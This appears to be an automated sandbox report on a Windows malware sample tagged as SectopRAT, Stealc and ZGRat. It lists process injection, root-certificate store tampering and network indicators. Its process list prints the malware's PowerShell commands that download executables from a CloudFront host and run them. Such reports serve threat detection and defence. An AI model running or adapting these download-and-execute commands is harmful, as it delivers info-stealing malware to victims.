Malware Analysis Report

2025-01-02 05:50

Sample ID 240426-k2mpssdc2y
Target file
SHA256 1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784
Tags
sectoprat stealc zgrat rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784

Threat Level: Known bad

The file file was found to be: Known bad.

Malicious Activity Summary

sectoprat stealc zgrat rat stealer trojan

SectopRAT payload

SectopRAT

ZGRat

Detect ZGRat V1

Stealc

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-26 09:05

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-26 09:05

Reported

2024-04-26 09:08

Platform

win7-20231129-en

Max time kernel

145s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2036 set thread context of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 636 set thread context of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3040 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 3040 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 3040 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 3040 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2668 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2668 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2668 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2668 wrote to memory of 352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1860 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe
PID 1860 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe
PID 1860 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe
PID 1860 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe
PID 2668 wrote to memory of 1688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 2036 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2036 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2036 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2036 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2036 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1860 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe
PID 1860 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe
PID 1860 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe
PID 1860 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe
PID 2464 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2464 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2464 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2464 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nst199A.tmp\load.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=28381000 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe

"C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"

C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe

"C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

Network

Country Destination Domain Proto
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
